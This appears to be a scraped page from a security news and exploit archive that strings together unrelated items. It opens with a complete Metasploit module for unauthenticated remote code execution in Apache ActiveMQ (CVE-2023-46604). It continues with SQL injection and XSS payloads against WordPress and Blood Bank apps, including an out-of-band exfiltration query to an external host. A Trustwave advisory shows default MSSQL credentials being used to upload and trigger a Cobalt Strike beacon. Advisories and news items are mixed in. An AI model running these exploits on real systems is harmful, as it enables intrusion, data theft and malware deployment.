This Metasploit module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to 5.16.6, and all versions before 5.15.16.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::Retry  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache          ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to          5.16.6, and all versions before 5.15.16.        },        'License' => MSF_LICENSE,        'Author' => [          'X1r0z', # Original technical analysis & exploit          'sfewer-r7', # MSF exploit & Rapid7 analysis        ],        'References' => [          ['CVE', '2023-46604'],          ['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],          ['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],          ['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],          ['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']        ],        'DisclosureDate' => '2023-10-27',        'Privileged' => false,        'Platform' => %w[win linux unix],        'Arch' => [ARCH_CMD],        # The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the        # Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will        # be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.        'Stance' => Stance::Aggressive,        'Targets' => [          [            'Windows',            {              'Platform' => 'win'            }          ],          [            'Linux',            {              'Platform' => 'linux'            }          ],          [            'Unix',            {              'Platform' => 'unix'            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          # By default ActiveMQ listens for OpenWire requests on TCP port 61616.          'RPORT' => 61616,          # The maximum time in seconds to wait for a session.          'WfsDelay' => 30        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )  end  def check    connect    res = sock.get_once    disconnect    return CheckCode::Unknown unless res    len, _, magic = res.unpack('NCZ*')    return CheckCode::Unknown unless res.length == len + 4    return CheckCode::Unknown unless magic == 'ActiveMQ'    return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/    version = Rex::Version.new(::Regexp.last_match(1))    ranges = [      ['5.18.0', '5.18.2'],      ['5.17.0', '5.17.5'],      ['5.16.0', '5.16.6'],      ['0.0.0', '5.15.15']    ]    ranges.each do |min, max|      if version.between?(Rex::Version.new(min), Rex::Version.new(max))        return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")      end    end    Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")  end  def exploit    # The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.    if payload.encoded.include? ']]>'      fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')    end    start_service    connect    # The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To    # leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we    # serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to    # run an attacker supplied command line via java.lang.ProcessBuilder.start.    clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'    # 31 is the EXCEPTION_RESPONSE data type.    data = [31].pack('C')    # ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.    data << [0].pack('N')    # and a 1 byte boolean for response required.    data << [0].pack('C')    # ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.    data << [0].pack('N')    # BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.    data << [1].pack('C')    # BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.    data << [1].pack('C')    # First 2 bytes are the length.    data << [clazz.length].pack('n')    # Then the string data. This is the class name to instantiate.    data << clazz    # Same again for the method string. This is the single string parameter used during class instantiation.    data << [1].pack('C')    data << [get_uri.length].pack('n')    data << get_uri    sock.puts([data.length].pack('N') + data)    retry_until_truthy(timeout: datastore['WfsDelay']) do      !handler_enabled? || session_created?    end    handler  ensure    cleanup  end  def on_request_uri(cli, request)    if request.uri != get_resource      super    end    case target['Platform']    when 'win'      shell = 'cmd.exe'      flag = '/c'    when 'linux', 'unix'      shell = '/bin/sh'      flag = '-c'    end    xml = %(<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="#{Rex::Text.rand_text_alpha(8)}" class="java.lang.ProcessBuilder" init-method="start">  <constructor-arg>    <list>      <value>#{shell}</value>      <value>#{flag}</value>      <value><![CDATA[#{payload.encoded}]]></value>    </list>  </constructor-arg></bean></beans>)    send_response(cli, xml, {      'Content-Type' => 'application/xml',      'Connection' => 'close',      'Pragma' => 'no-cache'    })    print_status('Sent ClassPathXmlApplicationContext configuration file.')  endend

Apache ActiveMQ Unauthenticated Remote Code Execution

The Microsoft Windows kernel suffers from a containerized registry escape through integer overflows in VrpBuildKeyPath and other weaknesses.

Windows Kernel Containerized Registry Escape

WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection# Date: 12-11-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.2 # Tested on: Windows, Linux# CVE: CVE-2023-32741# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of ConceptAffected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=Affected Parameter: form_idpayload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -# RecommendationUpgrade to version 1.1.3

WordPress Contact Form To Any API 1.1.2 SQL Injection

Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.

**CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a critical security vulnerability involving Stored Cross-Site Scripting (XSS) through multiple parameters (rename, remail, rphone, and rcity) in the /updateprofile.php file. The application fails to adequately sanitize user-supplied data, allowing attackers to inject malicious scripts into the application. This could lead to the execution of arbitrary script code in the browsers of unsuspecting users, potentially compromising their security and privacy within the context of the affected site.

**Vulnerability Details**

*   CVE ID: CVE-2023-46020
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: updateprofile.php
*   Parameters: rename, remail, rphone, rcity
*   Attack Type: local

**Description**

*   The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.

**Proof of Concept (PoC) :**

*   Intercept the POST request to updateprofile.php via Burp Suite
*   Inject the payload to the vulnerable parameters
*   Payload: "><svg/onload=alert(document.domain)>
*   Example request for rname parameter

    POST /bloodbank/file/updateprofile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/rprofile.php?id=1
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
    

*   Go to the profile page and trigger the XSS

CVE-2023-46020: GitHub - ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability

SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.

    ---
    GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b' HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    ---

CVE-2023-46021: GitHub - ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.

**CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'remail' parameter in the receiverReg.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

**Vulnerability Details**

*   CVE ID: CVE-2023-46018
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: /receiverReg.php
*   Parameter Name: remail
*   Attack Type: Local

**Description**

*   The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database

**Proof of Concept (PoC) :**

*   Save the POST request of receiverReg.php to a request.txt file.

    ---
    POST /bloodbank/file/receiverReg.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
    Content-Length: 877
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/register.php
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rname"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rbg"
    
    A+
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rcity"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rphone"
    
    05555555555
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="remail"
    
    test@test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rpassword"
    
    test123
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rregister"
    
    Register
    -----------------------------2653697510272605730288393868--
    
    ---
    

*   sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
    
*   current database: bloodbank

CVE-2023-46018: GitHub - ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

Red Hat Security Advisory 2023-6207-01 - Red Hat JBoss Web Server 5.7.6 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server. Issues addressed include an information leakage vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6207.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat JBoss Web Server 5.7.6 release and security updateAdvisory ID:        RHSA-2023:6207-01Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6207Issue date:         2023-10-31Revision:           01CVE Names:          CVE-2023-42795====================================================================Summary: Red Hat JBoss Web Server 5.7.6 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.7.6 serves as a replacement for Red Hat JBoss Web Server 5.7.5. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References section.Security Fix(es):* tomcat: improper cleaning of recycled objects could lead to information leak (CVE-2023-42795)* tomcat: incorrectly parsed http trailer headers can cause request smuggling (CVE-2023-45648)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-42795References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2023-6207-01

A list of topics we covered in the week of November 06 to November 12 of 2023

November 9, 2023 - A judge has refused to bring back a class action lawsuit against four car manufacturers because the privacy violation did not meet the WPA standard.

November 9, 2023 - The FBI is investigating a data breach where cybercriminals were able to steal patients’ records from a Las Vegas plastic surgeon's office and then publish them online.

November 9, 2023 - A SysAid vulnerability is actively being exploited by a ransomware affiliate.

November 8, 2023 - Users looking to download a popular PC utility may be tricked in this campaign where a threat actor has registered a website that copies content from a PC and Windows news portal.

November 8, 2023 - Scientists have developed a ChatGPT detector with unprecedented accuracy. Even though it has a limited scope, this could be a big step forward.

 A week in security (November 06 &#8211; November 12) 

Cybersecurity researchers have warned about a Windows version of a wiper malware that was previously observed targeting Linux systems in cyber attacks aimed at Israel.
Dubbed BiBi-Windows Wiper by BlackBerry, the wiper is the Windows counterpart of BiBi-Linux Wiper, which has been put to use by a pro-Hamas hacktivist group in the wake of the Israel-Hamas war last month.
"The Windows variant [...

Cybersecurity researchers have warned about a Windows version of a wiper malware that was previously observed targeting Linux systems in cyber attacks aimed at Israel.

Dubbed **BiBi-Windows Wiper** by BlackBerry, the wiper is the Windows counterpart of BiBi-Linux Wiper, which has been put to use by a pro-Hamas hacktivist group in the wake of the Israel-Hamas war last month.

"The Windows variant \[...\] confirms that the threat actors who created the wiper are continuing to build out the malware, and indicates an expansion of the attack to target end user machines and application servers," the Canadian company said Friday.

Slovak cybersecurity firm is tracking the actor behind the wiper under the name BiBiGun, noting that the Windows variant (bibi.exe) is designed to overwrite data in the C:\\Users directory recursively with junk data and appends .BiBi to the filename.

The BiBi-Windows Wiper artifact is said to have been compiled on October 21, 2023, two weeks after the onset of the war. The exact method by which it is distributed is currently unknown.

Besides corrupting all files with the exception of those with .exe, .dll, and .sys extensions, the wiper deletes shadow copies from the system, effectively preventing the victims from recovering their files.

Another notable similarity with its Linux variant is its multithreading capability.

"For the fastest possible destruction action, the malware runs 12 threads with eight processor cores," Dmitry Bestuzhev, senior director of cyber threat intelligence at BlackBerry, said.

It's not immediately clear if the wiper has been deployed in real-world attacks, and if so, who the targets are.

The development comes as Security Joes, which first documented BiBi-Linux Wiper, said the malware is part of a "larger campaign targeting Israeli companies with the deliberate intent to disrupt their day-to-day operations using data destruction."

The cybersecurity firm said it identified tactical overlaps between the hacktivist group, who call themselves Karma, and another geopolitically motivated actor codenamed Moses Staff (aka Cobalt Sapling), which is suspected to be of Iranian origin.

"Although the campaign has primarily centered around Israeli IT and government sectors up to this point, some of the participating groups, such as Moses Staff, have a history of simultaneously targeting organizations across various business sectors and geographical locations," Security Joes said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New BiBi-Windows Wiper Targets Windows Systems in Pro-Hamas Attacks

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

Trustwave SpiderLabs Security Advisory TWSL2023-006: Default MSSQL Database Password in Natus NeuroWorks EEG Software Published: 11/07/2023 Version: 1.0 Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software Product: NeuroWorks EEG Software Version affected: Prior to 8.4 GMA3 Product description: The Natus NeuroWorks platform simplifies the process of collecting, monitoring, trending and managing data for routine EEG testing, ambulatory EEG, long-term monitoring, ICU monitoring, and research studies. NeuroWorks systems are scalable to meet the needs of private practice clinics, hospitals, large teaching facilities and EEG service providers. Natus NeuroWorks is a cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies, exhibiting an advanced software for clinical excellence. The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies the management of patient, study and laboratory data. Filter studies by date, status, diagnosis, or use any built-in editable field to create custom filters for your unique needs. Track outcomes and filter by statistical indices that are calculated in the reports. The distributed database automatically updates system settings across the network to ensure that all workstations have current lab settings. Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database \*\*\*\*\*Credit: John Jackson of Trustwave Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and database for the management of medical research studies connected to the testing and monitoring software implemented via the Natus NeuroWorks platform. By default, the MSSQL service utilizes the administrative username 'sa' coupled with the password 'xltek'. An attacker can utilize the default credentials to access stored sensitive data or perform administrative functions and MSSQL queries. In addition, an attacker on the local network could potentionally leverage the credentials to access the file system of the server and perform read, write, and execution functions on the disk. Natus recommends against changing the default password as it will disable MigrateDB's ability to authenticate silently in instances of new virtual database creation. Proof of Concept/Summary: While the instance of default credentials is properly documented within the "XL Security Site Administrator Reference" guide, Natus specifically recommends against changing the default credentials. The document specifically states: "Each instance of SQL Server also has a system administrator username ('sa'). The default password is 'xltek'; however it can be changed for each instance of SQL Server. We strongly recommend using the default password for local SQL Server instances". Natus recommends against changing the password, because of their MigrateDB function. The document goes on to say: "MigrateDB is also called silently when a new 'virtual database' is created through Natus Database - XLDB. In this case, MigrateDB will not prompt the user for the 'sa' password. If the password for 'sa' has been altered on the local machine from its default, the creation of a new virtual server will fail". They do however recommend a workaround, which is to change the password back to xltek while performing new virtual database creation, and then once again change back to the default. ## Running the command 'whoami' using default credentials └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME nt authority\\network service ## Writing a cobalt strike beacon to a local windows directory └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\\\Temp\\\\Events\\\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\\Temp\\Events\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Size is 409088 bytes MSSQL SERVERNAME 1433 SERVERNAME \[+\] File has been uploaded on the remote machine └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\\Temp\\Events\\' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\\Temp\\Events MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

. MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

.. MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free ## Triggering the cobalt strike beacon └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\\Temp\\Events\\armsvc.exe' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME None ## Beacon command execution proof beacon> sleep 0 \[\*\] Tasked beacon to become interactive \[+\] host called home, sent: 16 bytes beacon> getuid \[\*\] Tasked beacon to get userid \[+\] host called home, sent: 8 bytes \[\*\] You are NT AUTHORITY\\NETWORK SERVICE beacon> run systeminfo \[\*\] Tasked beacon to run: systeminfo \[+\] host called home, sent: 28 bytes \[+\] received output: Host Name: SERVERNAME OS Name: Microsoft Windows 10 Enterprise 2016 LTSB OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: XXXXX-XXXXX-XXXXX-XXXXX Original Install Date: 6/6/2017, 5:39:30 PM System Boot Time: 6/17/2023, 2:07:18 PM System Manufacturer: Dell Inc. System Model: OptiPlex 5050 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. \[01\]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz BIOS Version: Dell Inc. 1.11.1, 11/29/2018 Windows Directory: C:\\windows System Directory: C:\\windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8,051 MB Available Physical Memory: 5,344 MB Virtual Memory: Max Size: 16,243 MB Virtual Memory: Available: 13,210 MB Virtual Memory: In Use: 3,033 MB Page File Location(s): C:\\pagefile.sys Domain: REDACTED FOR PRIVACY Logon Server: N/A Hotfix(s): 6 Hotfix(s) Installed. \[01\]: KB4013418 \[02\]: KB4033631 \[03\]: KB4049411 \[04\]: KB4103729 \[05\]: KB4132216 \[06\]: KB4103720 Network Card(s): 1 NIC(s) Installed. \[01\]: Intel(R) Ethernet Connection (5) I219-V Connection Name: LAN DHCP Enabled: Yes DHCP Server: X.X.X.X IP address(es) \[01\]: X.X.X.X Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes Vendor Response: The vendor has revised the Administrator Reference document by discontinuing the endorsement of default password usage. Instead, the vendor strongly recommends that all users change default SQL credentials. This requires to update the software to leverage the Credentials Cache feature, introduced in version 8.4 GMA3. The technical service team will provide the revised documentation to customers on request, and in the future, it will be integrated into the Neuroworks software installation package. The vendor has additionally released a security advisory regarding this threat. You can access the security bulletin at this link: https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf Remediation Steps: Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache feature and update the default SQL credentials. Revision History: 06/27/2023 - Trustwave disclosed vulnerability to vendor 07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation 07/18/2023 - Vendor has provided Trustwave with remediation plan 10/20/2023 - Vendor publishes security bulletin 11/07/2023 - Advisory published References 1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Tag

#windows